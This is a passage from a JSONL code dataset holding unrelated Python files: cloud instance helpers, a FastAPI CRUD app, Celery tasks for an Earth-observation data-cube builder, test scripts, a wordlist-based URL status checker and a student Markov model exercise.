response = json.loads(str(response, encoding='utf-8'))\n\n return response[\"InstanceId\"]\n\ndef createSecurityGroup():\n request = CreateSecurityGroupRequest()\n request.set_accept_format('json')\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef startInstance(InstanceId):\n request = StartInstanceRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef stopInstance(InstanceId):\n request = StopInstanceRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef rebootInstance(InstanceId):\n request = RebootInstanceRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef deleteInstance(InstanceId):\n request = DeleteInstanceRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef getInstanceStatus(InstanceId):\n request = DescribeInstanceStatusRequest()\n request.set_accept_format('json')\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n\n for entry in response[\"InstanceStatuses\"][\"InstanceStatus\"]:\n if entry[\"InstanceId\"] == InstanceId:\n return entry[\"Status\"]\n\n return None\n\ndef getInstanceAttribute(InstanceId):\n request = DescribeInstanceAttributeRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef getInstancePrivateIp(InstanceId):\n request = DescribeNetworkInterfacesRequest()\n request.set_accept_format('json')\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n\n for entry in response[\"NetworkInterfaceSets\"][\"NetworkInterfaceSet\"]:\n if entry[\"InstanceId\"] == InstanceId:\n return entry[\"PrivateIpSets\"][\"PrivateIpSet\"][0][\"PrivateIpAddress\"]\n \n return None\n\ndef getInstanceIdByPrivateIpAddress(PrivateIpAddress):\n request = DescribeNetworkInterfacesRequest()\n request.set_accept_format('json')\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n\n for entry in response[\"NetworkInterfaceSets\"][\"NetworkInterfaceSet\"]:\n if entry[\"PrivateIpSets\"][\"PrivateIpSet\"][0][\"PrivateIpAddress\"] == PrivateIpAddress:\n return entry[\"InstanceId\"]\n \n return None\n\ndef waitInstanceStatus(InstanceId, targetStatus, interval):\n while True:\n cur = getInstanceStatus(InstanceId)\n # print(cur)\n if cur == targetStatus:\n return\n time.sleep(interval)","sub_path":"cloudhelper_aliyun.py","file_name":"cloudhelper_aliyun.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"41499868","text":"\n'''\nMethods\n'''\n\n'''\nclass object\n'''\n\nclass student:\n Name = \"\"\n ID = \"\"\n GPA = \"\"\n\n def 
set_value(self,Name,ID,GPA):\n        self.Name = Name\n        self.ID = ID\n        self.GPA = GPA\n\n    def display(self):\n        print(f\"Name : {self.Name} ID : {self.ID} GPA : {self.GPA} \")\n\nstu1 = student()\nName = input(\"Enter Your Name : \")\nID = input(\"Enter Your Student ID : \")\nGPA = input(\"Enter Your GPA : \")\n\nstu1.set_value(Name,ID,GPA)\nstu1.display()\n","sub_path":"program_37 (Methods).py","file_name":"program_37 (Methods).py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"394366231","text":"import databases\nimport sqlalchemy\n\nfrom pydantic import BaseModel\nfrom fastapi import FastAPI\nfrom fastapi_crudrouter import DatabasesCRUDRouter\n\nDATABASE_URL = \"sqlite:///./test.db\"\n\ndatabase = databases.Database(DATABASE_URL)\nengine = sqlalchemy.create_engine(\n    DATABASE_URL,\n    connect_args={\"check_same_thread\": False}\n)\n\nmetadata = sqlalchemy.MetaData()\npotatoes = sqlalchemy.Table(\n    \"potatoes\",\n    metadata,\n    sqlalchemy.Column(\"id\", sqlalchemy.Integer, primary_key=True),\n    sqlalchemy.Column(\"thickness\", sqlalchemy.Float),\n    sqlalchemy.Column(\"mass\", sqlalchemy.Float),\n    sqlalchemy.Column(\"color\", sqlalchemy.String),\n    sqlalchemy.Column(\"type\", sqlalchemy.String),\n)\nmetadata.create_all(bind=engine)\n\n\nclass PotatoCreate(BaseModel):\n    thickness: float\n    mass: float\n    color: str\n    type: str\n\n\nclass Potato(PotatoCreate):\n    id: int\n\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def startup():\n    await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n    await database.disconnect()\n\n\nrouter = DatabasesCRUDRouter(\n    schema=Potato,\n    create_schema=PotatoCreate,\n    table=potatoes,\n    database=database\n)\napp.include_router(router)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"553587775","text":"#!/usr/bin/env python3\n\"\"\"Module documentation goes here\n\"\"\"\n\nimport string\nimport subprocess\nimport sys\n\nclass TestDecomposer:\n    \"\"\"Q & D class to test a student app.\n    \"\"\"\n    def __init__(self, test_no):\n        self._app = \"./base-decomposer\"\n        self._test_no = test_no\n        self._input = [\"12345\", \"-12345\"]\n        self._expected = [\n            \"10000 + 2000 + 300 + 40 + 5\",\n            \"-(10000 + 2000 + 300 + 40 + 5)\"]\n\n        self.test()\n\n\n    def test(self):\n        \"\"\"Method is called by constructor. It is public, but should not need to be\n        called explicitly.\n        \"\"\"\n        returncode, actual = self._run()\n        actual = \"\".join(filter(lambda x: x in string.printable, actual))\n\n        if returncode != 0:\n            print(\n                \"ERROR: EXPECTED return 0, ACTUAL return {}\".format(returncode),\n                file=sys.stderr)\n\n        if not actual:\n            print(\"ERROR: No output from student app.\", file=sys.stderr)\n            sys.exit(1)\n\n        print(\"STUDENT OUTPUT\")\n        print(\"\\t----------------------------------\")\n        print(\"\\t {}\".format(actual))\n        print(\"\\t----------------------------------\")\n\n        if actual == self._expected[self._test_no]:\n            print(\"CORRECT!\")\n        else:\n            print(\"INCORRECT...\")\n            print(\"  Expected:\\t{}\".format(self._expected[self._test_no]))\n            print(\"  Actual:\\t{}\".format(actual))\n            sys.exit(1)\n\n\n    def _run(self):\n        \"\"\"Does the actual work of running the tested app. 
Called by test method\n and returns the exit code of app and anything in STDOUT.\n \"\"\"\n with subprocess.Popen(\n self._app, stderr=subprocess.PIPE,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE) as proc:\n out, _ = proc.communicate(\n input=self._input[self._test_no].encode(\"utf-8\"))\n\n try:\n return proc.returncode, out.decode(\"utf-8\") if out else None\n except UnicodeDecodeError as decode_exception:\n return proc.returncode, \\\n \"Serious execution badness: {}\".format(decode_exception)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"USAGE: test_parse_grades.py [1 | 2] to run tests 1 or 2\")\n else:\n TestDecomposer(int(sys.argv[1]) - 1)\n","sub_path":"Homework/hw1/test_decomposer.py","file_name":"test_decomposer.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"566887572","text":"#\n# This file is part of Python Module for Cube Builder.\n# Copyright (C) 2019-2020 INPE.\n#\n# Cube Builder is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n#\n\n\"\"\"Define celery tasks for Cube Builder.\"\"\"\n\n# Python Native\nimport logging\nimport traceback\nfrom copy import deepcopy\n\n# 3rdparty\nfrom bdc_catalog.models import Collection, db\nfrom celery import chain, group\n\n# Cube Builder\nfrom ..celery import celery_app\nfrom ..constants import CLEAR_OBSERVATION_NAME, DATASOURCE_NAME, PROVENANCE_NAME, TOTAL_OBSERVATION_NAME\nfrom ..models import Activity\nfrom ..utils.image import create_empty_raster, match_histogram_with_merges\nfrom ..utils.processing import DataCubeFragments\nfrom ..utils.processing import blend as blend_processing\nfrom ..utils.processing import build_cube_path, compute_data_set_stats, get_or_create_model\nfrom ..utils.processing import merge as merge_processing\nfrom ..utils.processing import post_processing_quality, publish_datacube, publish_merge\n\n\ndef capture_traceback(exception=None):\n \"\"\"Retrieve stacktrace as string.\"\"\"\n return traceback.format_exc() or str(exception)\n\n\ndef create_execution(activity: dict) -> Activity:\n \"\"\"Create cube-builder activity and prepare celery execution.\n\n Args:\n activity - Cube Builder Activity dict\n\n Returns:\n Activity the cube build activity model\n \"\"\"\n where = dict(\n band=activity.get('band'),\n period=activity.get('period'),\n date=activity.get('date'),\n tile_id=activity.get('tile_id')\n )\n\n model, created = get_or_create_model(Activity, defaults=activity, **where)\n\n logging.debug('Activity {}, {}, {}, {} - {}'.format(model.tile_id, model.band, model.date,\n model.collection_id, created))\n\n return model\n\n\n@celery_app.task(queue='merge-cube')\ndef warp_merge(activity, band_map, force=False, **kwargs):\n \"\"\"Execute datacube merge task.\n\n This task consists in the following steps:\n\n **1.** Prepare a raster using dimensions of datacube GRS schema.\n **2.** Open collection dataset with RasterIO and reproject to datacube GRS Schema.\n **3.** Fill the respective pathrow into raster\n\n Args:\n activity - Datacube Activity Model\n force - Flag to build data cube without cache.\n\n Returns:\n Validated activity\n \"\"\"\n logging.warning('Executing merge {} - {}'.format(activity.get('warped_collection_id'), activity['band']))\n\n record = create_execution(activity)\n\n record.warped_collection_id = activity['warped_collection_id']\n merge_date = activity['date']\n\n tile_id = 
activity['tile_id']\n version = activity['args']['version']\n\n merge_file_path = None\n\n if activity['args'].get('reuse_datacube'):\n collection = Collection.query().filter(Collection.id == activity['args']['reuse_datacube']).first()\n\n if not force:\n # TODO: Should we search in Activity instead?\n merge_file_path = build_cube_path(collection.name, merge_date, tile_id,\n version=collection.version, band=record.band)\n\n if not merge_file_path.exists():\n # TODO: Should we raise exception??\n logging.warning(f'Cube {record.warped_collection_id} requires {collection.name}, but the file {str(merge_file_path)} not found. Skipping')\n raise RuntimeError(\n f\"\"\"Cube {record.warped_collection_id} is derived from {collection.name},\n but the file {str(merge_file_path)} was not found.\"\"\"\n )\n\n else:\n raise RuntimeError(\n f'Cannot use option \"force\" for derived data cube - {record.warped_collection_id} of {collection.name}'\n )\n\n if merge_file_path is None:\n merge_file_path = build_cube_path(record.warped_collection_id, merge_date,\n tile_id, version=version, band=record.band)\n\n if activity['band'] == band_map['quality'] and len(activity['args']['datasets']):\n kwargs['build_provenance'] = True\n\n reused = False\n\n # Reuse merges already done. Rebuild only with flag ``--force``\n if not force and merge_file_path.exists() and merge_file_path.is_file():\n efficacy = cloudratio = 0\n\n if activity['band'] == band_map['quality']:\n # When file exists, compute the file statistics\n efficacy, cloudratio = compute_data_set_stats(str(merge_file_path))\n\n reused = True\n\n activity['args']['file'] = str(merge_file_path)\n activity['args']['efficacy'] = efficacy\n activity['args']['cloudratio'] = cloudratio\n record.traceback = ''\n\n args = deepcopy(record.args)\n args.update(activity['args'])\n\n activity['args'] = args\n\n record.args = args\n record.save()\n else:\n record.status = 'STARTED'\n record.save()\n\n record.args = activity['args']\n\n try:\n args = deepcopy(activity.get('args'))\n args.pop('period', None)\n args['tile_id'] = tile_id\n args['date'] = record.date.strftime('%Y-%m-%d')\n args['cube'] = record.warped_collection_id\n\n empty = args.get('empty', False)\n\n # Create base directory\n merge_file_path.parent.mkdir(parents=True, exist_ok=True)\n\n if empty:\n # create empty raster\n file_path = create_empty_raster(str(merge_file_path),\n proj4=args['srs'],\n cog=True,\n nodata=args['nodata'],\n dtype='int16', # TODO: Pass through args\n dist=[args['dist_x'], args['dist_y']],\n resolution=[args['resx'], args['resy']],\n xmin=args['xmin'],\n ymax=args['ymax'])\n res = dict(\n file=str(file_path),\n efficacy=100,\n cloudratio=0,\n resolution=args['resx'],\n nodata=args['nodata']\n )\n else:\n res = merge_processing(str(merge_file_path), band_map=band_map, band=record.band, **args, **kwargs)\n\n merge_args = deepcopy(activity['args'])\n merge_args.update(res)\n\n record.traceback = ''\n record.status = 'SUCCESS'\n record.args = merge_args\n\n activity['args'].update(merge_args)\n except BaseException as e:\n record.status = 'FAILURE'\n record.traceback = capture_traceback(e)\n logging.error('Error in merge. Activity {}'.format(record.id), exc_info=True)\n\n raise e\n finally:\n record.save()\n\n logging.warning('Merge {} executed successfully. 
Efficacy={}, cloud_ratio={}'.format(\n str(merge_file_path),\n activity['args']['efficacy'],\n activity['args']['cloudratio']\n ))\n\n activity['args']['reused'] = reused\n\n return activity\n\n\n@celery_app.task(queue='prepare-cube')\ndef prepare_blend(merges, band_map: dict, **kwargs):\n \"\"\"Receive merges by period and prepare task blend.\n\n This task aims to prepare celery task definition for blend.\n A blend requires both data set quality band and others bands. In this way, we must group\n these values by temporal resolution and then schedule blend tasks.\n \"\"\"\n block_size = kwargs.get('block_size')\n\n activities = dict()\n\n # Prepare map of efficacy/cloud_ratio based in quality merge result\n quality_date_stats = {\n m['date']: (m['args']['efficacy'], m['args']['cloudratio'], m['args']['file'], m['args']['reused'])\n for m in merges if m['band'] == band_map['quality']\n }\n\n version = merges[0]['args']['version']\n\n for period, stats in quality_date_stats.items():\n _, _, quality_file, was_reused = stats\n\n # Do not apply post-processing on reused data cube since it may be already processed.\n if not was_reused:\n logging.info(f'Applying post-processing in {str(quality_file)}')\n post_processing_quality(quality_file, list(band_map.values()), merges[0]['warped_collection_id'],\n period, merges[0]['tile_id'], band_map['quality'], version=version, block_size=block_size)\n else:\n logging.info(f'Skipping post-processing {str(quality_file)}')\n\n def _is_not_stk(_merge):\n \"\"\"Control flag to generate cloud mask.\n\n This function is a utility to dispatch the cloud mask generation only for STK data cubes.\n \"\"\"\n return _merge['band'] == band_map['quality'] and not _merge['collection_id'].endswith('STK')\n\n for _merge in merges:\n # Skip quality generation for MEDIAN, AVG\n if _merge['band'] in activities and _merge['args']['date'] in activities[_merge['band']]['scenes'] or \\\n _is_not_stk(_merge):\n continue\n\n activity = activities.get(_merge['band'], dict(scenes=dict()))\n\n activity['datacube'] = _merge['collection_id']\n activity['warped_datacube'] = _merge['warped_collection_id']\n activity['band'] = _merge['band']\n activity['scenes'].setdefault(_merge['args']['date'], dict(**_merge['args']))\n activity['period'] = _merge['period']\n activity['tile_id'] = _merge['tile_id']\n activity['nodata'] = _merge['args'].get('nodata')\n activity['version'] = version\n # TODO: Check instance type for backward compatibility\n activity['datasets'] = _merge['args']['datasets']\n\n # Map efficacy/cloud ratio to the respective merge date before pass to blend\n efficacy, cloudratio, quality_file, _ = quality_date_stats[_merge['date']]\n activity['scenes'][_merge['args']['date']]['efficacy'] = efficacy\n activity['scenes'][_merge['args']['date']]['cloudratio'] = cloudratio\n\n if _merge['args'].get('reuse_datacube'):\n activity['reuse_datacube'] = _merge['args']['reuse_datacube']\n\n activity['scenes'][_merge['args']['date']]['ARDfiles'] = {\n band_map['quality']: quality_file,\n _merge['band']: _merge['args']['file']\n }\n\n if _merge['args'].get(DATASOURCE_NAME):\n activity['scenes'][_merge['args']['date']]['ARDfiles'][DATASOURCE_NAME] = _merge['args'][DATASOURCE_NAME]\n\n activities[_merge['band']] = activity\n\n # TODO: Add option to skip histogram.\n if kwargs.get('histogram_matching'):\n ordered_best_efficacy = sorted(quality_date_stats.items(), key=lambda item: item[1][0], reverse=True)\n\n best_date, (_, _, best_mask_file, _) = ordered_best_efficacy[0]\n dates = map(lambda 
entry: entry[0], ordered_best_efficacy[1:])\n\n for date in dates:\n logging.info(f'Applying Histogram Matching: Reference date {best_date}, current {date}...')\n for band, activity in activities.items():\n reference = activities[band]['scenes'][best_date]['ARDfiles'][band]\n\n if band == band_map['quality']:\n continue\n\n source = activity['scenes'][date]['ARDfiles'][band]\n source_mask = activity['scenes'][date]['ARDfiles'][band_map['quality']]\n match_histogram_with_merges(source, source_mask, reference, best_mask_file, block_size=block_size)\n\n # Prepare list of activities to dispatch\n activity_list = list(activities.values())\n\n datacube = activity_list[0]['datacube']\n\n # For IDENTITY data cube trigger, just publish\n if DataCubeFragments(datacube).composite_function == 'IDENTITY':\n task = publish.s(list(activities.values()))\n return task.apply_async()\n\n logging.warning('Scheduling blend....')\n\n blends = []\n\n # We must keep track of last activity to run\n # Since the Clear Observation must only be execute by single process. It is important\n # to avoid concurrent processes to write same data set in disk\n last_activity = activity_list[-1]\n\n # Trigger all except the last\n for activity in activity_list[:-1]:\n # TODO: Persist\n blends.append(blend.s(activity, band_map))\n\n # Trigger last blend to execute Clear Observation\n blends.append(blend.s(last_activity, band_map, build_clear_observation=True))\n\n task = chain(group(blends), publish.s(band_map, **kwargs))\n task.apply_async()\n\n\n@celery_app.task(queue='blend-cube')\ndef blend(activity, band_map, build_clear_observation=False, **kwargs):\n \"\"\"Execute datacube blend task.\n\n Args:\n activity - Datacube Activity Model.\n band_map - Band mapping with common_name and band original name.\n build_clear_observation - Generate band \"Clear Observation\".\n\n Returns:\n Validated activity\n \"\"\"\n block_size = kwargs.get('block_size')\n\n logging.warning('Executing blend - {} - {}'.format(activity.get('datacube'), activity.get('band')))\n\n return blend_processing(activity, band_map, build_clear_observation, block_size=block_size)\n\n\n@celery_app.task(queue='publish-cube')\ndef publish(blends, band_map, **kwargs):\n \"\"\"Execute publish task and catalog datacube result.\n\n Args:\n activity - Datacube Activity Model\n \"\"\"\n period = blends[0]['period']\n logging.info(f'Executing publish {period}')\n\n version = blends[0]['version']\n\n cube: Collection = Collection.query().filter(\n Collection.name == blends[0]['datacube'],\n Collection.version == version\n ).first()\n warped_datacube = blends[0]['warped_datacube']\n tile_id = blends[0]['tile_id']\n reused_cube = blends[0].get('reuse_datacube')\n\n # Retrieve which bands to generate quick look\n bands = cube.bands\n band_id_map = {band.id: band.name for band in bands}\n\n quicklook = cube.quicklook[0]\n\n quick_look_bands = [band_id_map[quicklook.red], band_id_map[quicklook.green], band_id_map[quicklook.blue]]\n\n merges = dict()\n blend_files = dict()\n\n composite_function = DataCubeFragments(cube.name).composite_function\n\n quality_blend = None\n\n for blend_result in blends:\n if composite_function != 'IDENTITY':\n blend_files[blend_result['band']] = blend_result['blends']\n\n if blend_result.get('clear_observation_file'):\n blend_files[CLEAR_OBSERVATION_NAME] = {composite_function: blend_result['clear_observation_file']}\n\n if blend_result.get('total_observation'):\n blend_files[TOTAL_OBSERVATION_NAME] = {composite_function: 
blend_result['total_observation']}\n\n if blend_result.get('provenance'):\n blend_files[PROVENANCE_NAME] = {composite_function: blend_result['provenance']}\n\n if blend_result.get('datasource'):\n blend_files[DATASOURCE_NAME] = {composite_function: blend_result['datasource']}\n\n for merge_date, definition in blend_result['scenes'].items():\n merges.setdefault(merge_date, dict(datasets=definition.get('datasets', definition.get('dataset')),\n cloudratio=definition['cloudratio'],\n ARDfiles=dict()))\n merges[merge_date]['ARDfiles'].update(definition['ARDfiles'])\n\n if blend_result['band'] == band_map['quality']:\n quality_blend = blend_result\n\n if composite_function != 'IDT':\n cloudratio = quality_blend['cloudratio']\n\n # Generate quick looks for cube scenes\n publish_datacube(cube, quick_look_bands, tile_id, period, blend_files, cloudratio, band_map, **kwargs)\n\n # Generate quick looks of irregular cube\n wcube = Collection.query().filter(Collection.name == warped_datacube, Collection.version == version).first()\n\n if not reused_cube:\n for merge_date, definition in merges.items():\n publish_merge(quick_look_bands, wcube, tile_id, merge_date, definition, band_map)\n\n try:\n db.session.commit()\n except:\n db.session.rollback()\n","sub_path":"cube_builder/celery/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":16345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"51301666","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport os\nimport unittest\n\nfrom azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)\n\n\nTEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))\n\n\nclass AgsScenarioTest(ScenarioTest):\n\n @ResourceGroupPreparer(name_prefix='cli_test_amg')\n def test_amg_e2e(self, resource_group):\n\n self.kwargs.update({\n 'name': 'clitestamg',\n 'location': 'westeurope'\n })\n\n self.cmd('grafana create -g {rg} -n {name} -l {location} --tags foo=doo --skip-role-assignments', checks=[\n self.check('tags.foo', 'doo'),\n self.check('name', '{name}')\n ])\n self.cmd('grafana list -g {rg}')\n count = len(self.cmd('grafana list').get_output_in_json())\n self.cmd('grafana show -g {rg} -n {name}', checks=[\n self.check('name', '{name}'),\n self.check('resourceGroup', '{rg}'),\n self.check('tags.foo', 'doo')\n ])\n\n self.cmd('grafana delete -g {rg} -n {name} --yes')\n final_count = len(self.cmd('grafana list').get_output_in_json())\n self.assertTrue(final_count, count - 1)","sub_path":"src/amg/azext_amg/tests/latest/test_amg_scenario.py","file_name":"test_amg_scenario.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"364387305","text":"from random import randint\nfrom sys import argv\nfrom time import sleep, time\n\nfrom requests import get\n\nMAX_WORD_LENGTH = 0\nVERBOSE = True\n\n\ndef wait(minimum: int = 5, maximum: int = 8) -> None:\n random_number = randint(minimum, maximum)\n if VERBOSE:\n print(f\"[helpers:wait] Sleeping for {random_number} sec...\")\n sleep(random_number)\n if VERBOSE:\n print(f\"[helpers:wait] Done.\")\n\n\ndef is_full_url(url: str) -> bool:\n if 
\"https://\" in url or \"http://\" in url:\n if VERBOSE:\n print(\"[helpers:is_full_url] This URL is full, with schema.\")\n return True\n if VERBOSE:\n print(\n \"[helpers:is_full_url] This URL is not full, just domain name.\"\n )\n return False\n\n\nurl = argv[1]\nfile_path = argv[2]\n\nif not is_full_url(url):\n url = f\"https://{url}{'' if url.endswith('/') else '/'}\"\nelse:\n if not url.endswith(\"/\"):\n url += \"/\"\n\nwith open(file_path) as openfile:\n words = [\n word.strip()\n for word in openfile.readlines()\n if word.strip()\n ]\n if VERBOSE:\n print(f\"[__main__] Readed {len(words)} words from file:\\n{words}\")\n\nresult = {\n \"ok\": list(),\n \"not_ok\": list(),\n \"time_token_requests\": 0,\n \"time_token_with_requests_and_waits\": 0,\n}\n\nfor idx, word in enumerate(words, 1):\n\n if len(word) > MAX_WORD_LENGTH:\n MAX_WORD_LENGTH = len(word)\n\n start_time = time()\n try:\n if VERBOSE:\n print(\n f\"[__main__] Making request to the URL address: {url + word}\"\n )\n response = get(url + word)\n except Exception as e:\n raise Exception(f\"Bad URL.\\nMore data of exception: {e}\")\n request_end_time = time()\n if response.status_code == 200:\n if VERBOSE:\n print(f\"[__main__] {word} --- OK.\")\n result[\"ok\"].append(word)\n else:\n if VERBOSE:\n print(f\"[__main__] {word} --- NOT OK!\")\n result[\"not_ok\"].append(word)\n\n # Check for last item, if it's then don't call wait() \n # function for save time\n if not idx == len(words) - 1:\n wait()\n\n # Timing\n end_time_with_request_and_wait = time()\n result[\"time_token_requests\"] += request_end_time - start_time\n result[\"time_token_with_requests_and_waits\"] += end_time_with_request_and_wait - start_time\n\nwith open(file_path + \"_result\", \"w\") as openfile:\n if VERBOSE:\n print(\"[__main__] Writing file with results...\")\n openfile.write(\n f\"\\nRESULTS OF DATA FROM FILE: {file_path}\\n\\n\"\n f\"Requests time token: {result['time_token_requests']} sec.\\n\"\n f\"Total time (with waits): {result['time_token_with_requests_and_waits']} sec.\\n\"\n f\"Free addresses number: {len(result['not_ok'])}\\n\"\n f\"Taken addresses number: {len(result['ok'])}\\n\"\n f\"Total address number: {len(words)}\\n\\n\"\n )\n\n if VERBOSE:\n print(\"[__main__] Writing addresses that have 200 status...\")\n openfile.write(\"OK:\\n\\n\")\n for word in result[\"ok\"]:\n openfile.write(\n f\"{word} {' ' * (MAX_WORD_LENGTH - len(word))} [{url + word}]\\n\"\n )\n\n if VERBOSE:\n print(\"[__main__] Writing addresses that haven't 200 status...\")\n openfile.write(\"\\nNOT OK:\\n\\n\")\n for word in result[\"not_ok\"]:\n openfile.write(\n f\"{word} {' ' * (MAX_WORD_LENGTH - len(word))} [{url + word}]\\n\"\n )\n\nif VERBOSE:\n print(\"[__main__] Done!\")\n","sub_path":"200_status_finder/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"458495096","text":"# -*- coding: utf-8 -*-\n#------------------------------------------------------------------\n# LEIA E PREENCHA O CABEÇALHO \n# NÃO ALTERE OS NOMES DAS FUNÇÕES\n# NÃO APAGUE OS DOCSTRINGS\n# NÃO INCLUA NENHUM import ...\n#------------------------------------------------------------------\n\n'''\n\n Nome: Guilherme Zorzon\n NUSP: 10333380\n\n Ao preencher esse cabeçalho com o meu nome e o meu número USP,\n declaro que todas as partes originais desse exercício programa (EP)\n foram desenvolvidas e implementadas por mim e que portanto não \n constituem 
desonestidade acadêmica ou plágio.\n Declaro também que sou responsável por todas as cópias desse\n programa e que não distribui ou facilitei a sua distribuição.\n Estou ciente que os casos de plágio e desonestidade acadêmica\n serão tratados segundo os critérios divulgados na página da \n disciplina.\n Entendo que EPs sem assinatura devem receber nota zero e, ainda\n assim, poderão ser punidos por desonestidade acadêmica.\n\n Abaixo descreva qualquer ajuda que você recebeu para fazer este\n EP. Inclua qualquer ajuda recebida por pessoas (inclusive\n monitores e colegas). Com exceção de material de MAC0110, caso\n você tenha utilizado alguma informação, trecho de código,...\n indique esse fato abaixo para que o seu programa não seja\n considerado plágio ou irregular.\n\n Exemplo:\n\n A monitora me explicou que eu devia utilizar a função int() quando\n fazemos leitura de números inteiros.\n\n A minha função quicksort() foi baseada na descrição encontrada na \n página https://www.ime.usp.br/~pf/algoritmos/aulas/quick.html.\n\n Descrição de ajuda ou indicação de fonte:\n\n'''\n#------------------------------------------------------------------\nclass MarkovModel:\n\n def __init__(self, k, corpus):\n\n self.corpus = corpus\n self.k = k\n \n str_temp = corpus #String temporária para que possa ser modificada\n cont = 0 \n vet_alphab = [] #vetor que guarda as letras do alfabeto\n\n while(len(str_temp) > 0):\n i = 0\n while( i < len(vet_alphab) and str_temp[0] >= vet_alphab[i]): #faz com que o vetor fique ordenado em ordem crescente\n i += 1\n vet_alphab.insert(i, str_temp[0])\n str_temp = str_temp.replace(str_temp[0], \"\") #tira as letras já vista da string temporária\n cont += 1\n\n self.no_simb = cont\n self.alph = vet_alphab\n self.circular = self.corpus + self.corpus[0:self.k] #Crio uma string circular cortando só o que preciso de corpus e adicionando ao final\n\n def alphabet(self):\n string = \"'\"\n for char in self.alph: #Crio a string apenas para atender ao padrão de saída imposto no EP\n string += char\n\n string += \"'\"\n return string\n \n\n def N(self, t):\n conta_seq = 0\n if(len(t) != (self.k) and len(t) != (self.k + 1)):\n return None\n \n for i in range(len(self.corpus)):\n var = True\n for j in range(len(t)):\n if(t[j] != self.circular[j + i]):\n var = False\n if(var == True):\n conta_seq += 1\n\n if(conta_seq == 0): #Se a string se encaixar nos padrões pedidos (len = k ou k+1) e não se encontrar em self.corpus, na verdade ela deve retornar None\n return None\n return conta_seq\n\n\n def laplace(self, t):\n if(len(t) != (self.k + 1)):\n return None\n temp = t[:-1] #Crio uma string de tamanho k para obter N(pal)\n s1 = self.N(t) #N(pal + c)\n s2 = self.N(temp) #N(pal)\n if(s1 == None):\n s1 = 0\n if(s2 == None):\n s2 = 0\n \n return (s1 + 1)/(s2 + len(self.alph)) #len(self.alph) é o tamanho do vetor que contém as letras do alfabeto ( = A)\n\n\n def __str__(self):\n vec_comparak = []\n vec_comparak2 = []\n \n string = \"alfabeto tem \" + str(len(self.alph)) + \" símbolos\\n\"\n \n #Os dois laços abaixo criam dois vetores com todos as strings t de len = k ou k+ 1\n #ordenados em ordem alfabética, sem repetição\n for i in range(len(self.corpus)):\n j = self.circular[i: i+self.k]\n m = 0\n while(m < len(vec_comparak) and j > vec_comparak[m]): #coloca em ordem alfabética\n m += 1\n if(m == len(vec_comparak) or j != vec_comparak[m]): #garante que não há repetição\n vec_comparak.insert(m, j)\n\n for i in range(len(self.corpus)):\n j = self.circular[i: i+self.k+1]\n m = 0\n while(m < 
len(vec_comparak2) and j > vec_comparak2[m]):\n m += 1\n if( m == len(vec_comparak2) or j != vec_comparak2[m]):\n vec_comparak2.insert(m, j)\n \n for i in range(len(vec_comparak)):\n string += '\"' + vec_comparak[i] + '\" ' + str(self.N(vec_comparak[i])) + \"\\n\"\n for i in range(len(vec_comparak2)):\n string += '\"' + vec_comparak2[i] + '\" ' + str(self.N(vec_comparak2[i])) + \"\\n\"\n \n return string\n \n#------------------------------------------------------------------\ndef main():\n corpus1 = \"aabcabaacaac\"\n corpus2 = \"babababaabababaabaabaaaaaababaaaab\"\n corpus3 = \"Como é bom estudar MAC0122!\"\n print(\"corpus1: \\n\" + corpus1)\n print(\"corpus2: \\n\" + corpus2)\n print(\"corpus3: \\n\" + corpus3)\n print()\n \n modelo1 = MarkovModel(2, corpus1)\n modelo2 = MarkovModel(4, corpus2)\n modelo3 = MarkovModel(0, corpus3)\n\n print(modelo1)\n print()\n print(modelo2)\n print()\n print(modelo3)\n print()\n\n print(\"alfabeto 1: \\n\" + modelo1.alphabet())\n print(\"alfabeto 2: \\n\" + modelo2.alphabet())\n print(\"alfabeto 3: \\n\" + modelo3.alphabet())\n print()\n\n print(\"N de 'aa' para o modelo1: \" + 